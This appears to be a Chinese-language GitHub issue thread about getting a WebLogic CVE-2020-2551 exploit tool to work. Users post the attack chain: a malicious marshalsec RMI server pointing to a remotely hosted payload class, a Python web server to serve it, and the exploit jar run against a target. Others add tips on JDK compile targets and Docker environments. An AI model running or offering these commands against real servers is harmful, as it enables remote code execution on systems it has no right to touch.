Y4er
commented
4 years ago 请说明你的具体操作,光一行字我猜不出来。
Closed PolarPeak closed 4 years ago
Y4er
commented
4 years ago 请说明你的具体操作,光一行字我猜不出来。
PolarPeak
commented
4 years ago 请说明你的具体操作,光一行字我猜不出来。
marshalsec起一个恶意的RMI服务java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://xx.xx.xx.xx/exp" 1099(exp本地编译的大佬博客那个,curl改为自己服务器地址)
python -m http.server --bind 0.0.0.0 80
java -jar weblogic_CVE_2020_2551.jar xx.xx.xx.xx 7001 rmi://xx.xx.xx.xx:1099/exp
最后就是这样的,本地和远程都不行哎!大佬能留个联系方式吗?方便交流
shushen1998
commented
4 years ago 俺也跟他一样耶不行
xxxxbxxxxx
commented
4 years ago 请说明你的具体操作,光一行字我猜不出来。
marshalsec起一个恶意的RMI服务java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://xx.xx.xx.xx/exp" 1099(exp本地编译的大佬博客那个,curl改为自己服务器地址)
python -m http.server --bind 0.0.0.0 80
java -jar weblogic_CVE_2020_2551.jar xx.xx.xx.xx 7001 rmi://xx.xx.xx.xx:1099/exp
最后就是这样的,本地和远程都不行哎!大佬能留个联系方式吗?方便交流
检查你的环境是否为 Docker 环境,如果是 Docker 环境铁定不行,另外检查编译的 EXP 版本,如果编译的版本高于靶机的 JDK 版本会执行失败,10.3.6.0 版本兼容 JDK,目前为 1.6 和 1.7,所以编译的时候 EXP 最好使用 javac xxx.java -target 1.6 -source 1.6 进行编译处理。
Y4er
commented
4 years ago
你好,本地WebLogic Server 版本: 10.3.6.0提示无回显自行检测是什么情况? dnslog也没有呀